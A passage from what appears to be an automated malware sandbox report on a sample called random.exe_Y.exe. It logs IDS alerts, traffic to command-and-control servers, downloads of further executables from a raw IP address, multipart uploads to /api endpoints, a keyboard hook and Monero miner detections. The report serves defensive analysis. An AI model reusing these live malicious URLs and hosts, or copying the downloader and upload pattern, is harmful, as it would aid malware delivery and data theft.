91 cf df a5 97 f1 e8 54 68 06 ec 16 ae 54 ea 85 97 3e ba d3 bb 9c 63 20 a8 f3 56 04 b5 d9 6f 44 65 51 53 4d 1a 14 28 19 f1 81 7a e6 e4 90 82 6a ef 9e f0 eb 39 51 62 ec b1 68 fd 3b a7 fa ee 03 b5 e5 69 ce 43
                            Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 57 35 49 30 34 52 4a 67 38 48 38 7a 6d 78 39 67 31 37 33 34 35 31 38 38 38 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "W5I04RJg8H8zmx9g1734518880", "data": "Done2" }
                            Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                            Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
                            Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49806 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49837 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49859 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49880 -> 104.21.64.80:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49886 -> 104.21.64.80:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49878 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49910 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49930 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49941 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49955 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49967 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49978 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49990 -> 172.67.209.202:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 172.67.209.202:443
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=74PNI4XZW2SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12816Host: pancakedipyps.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=28WX2WOCTWQ107PDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15092Host: pancakedipyps.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GKNINE9LBXH7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19926Host: pancakedipyps.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PRO4VUDRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1232Host: pancakedipyps.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0Z7WEBKP4WS9XZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571932Host: pancakedipyps.click
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000AE0C0 recv,recv,recv,recv,0_2_000AE0C0
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                            Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /WEIsmPfDcpBFJozngnYN1734366322?argument=W5I04RJg8H8zmx9g1734518880 HTTP/1.1Host: home.twentytk20pn.topAccept: */*
                            Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                            Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                            Source: global trafficDNS traffic detected: DNS query: httpbin.org
                            Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
                            Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                            Source: global trafficDNS traffic detected: DNS query: twentytk20pn.top
                            Source: global trafficDNS traffic detected: DNS query: www.google.com
                            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php.usere
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0l
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php6879001
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7H
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php879001
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpHH
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpLocal
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpT
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpTemp
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcal
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpes
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpo
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.0000000000598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exeedB
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exem
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exe
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exe4&M
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exel%
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exe
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exeE
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exe
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                            Source: 4802836d37.exe, 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                            Source: svchost.exe, 00000025.00000002.2836976541.00000000008EC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe
                            Source: svchost.exe, 00000025.00000002.2836976541.00000000008EC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxex
                            Source: skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                            Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                            Source: Intel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                            Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.6:49880 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49930 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49941 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49955 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49967 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49978 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:49990 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.6:50000 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,000000008_2_00408DBB
                            Source: d7691cd336.exe, 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_6e1d12b5-9
                            Source: d7691cd336.exe, 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_9c721b13-5
                            Source: Yara matchFile source: 36.3.d7691cd336.exe.4ef0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.3.d7691cd336.exe.5110000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.3.svchost.exe.5300000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.3.svchost.exe.50e0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.3.svchost.exe.5300000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.3.d7691cd336.exe.5110000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000003.2822637005.0000000005300000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2816838324.0000000005110000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: d7691cd336.exe PID: 6316, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1484, type: MEMORYSTR

                            System Summary

                            barindex
                            Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 50.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 50.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: file.bin.8.drZip Entry: encrypted
                            Source: random.exe_Y.exeStatic PE information: section name:
                            Source: random.exe_Y.exeStatic PE information: section name: .idata
                            Source: skotes.exe.0.drStatic PE information: section name:
                            Source: skotes.exe.0.drStatic PE information: section name: .idata
                            Source: random[1].exe0.6.drStatic PE information: section name:
                            Source: random[1].exe0.6.drStatic PE information: section name: .idata
                            Source: random[1].exe0.6.drStatic PE information: section name:
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name:
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name: .idata
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name:
                            Source: random[1].exe2.6.drStatic PE information: section name:
                            Source: random[1].exe2.6.drStatic PE information: section name: .idata
                            Source: random[1].exe2.6.drStatic PE information: section name:
                            Source: d7691cd336.exe.6.drStatic PE information: section name:
                            Source: d7691cd336.exe.6.drStatic PE information: section name: .idata
                            Source: d7691cd336.exe.6.drStatic PE information: section name:
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B9CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_00B9CB97
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007996AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,12_2_007996AC
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000A5C830_2_000A5C83
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000A735A0_2_000A735A
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000E88600_2_000E8860
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_001B81010_2_001B8101
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000A4DE00_2_000A4DE0
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000A4B300_2_000A4B30
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_001B7B6E0_2_001B7B6E
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BC78BB2_2_00BC78BB
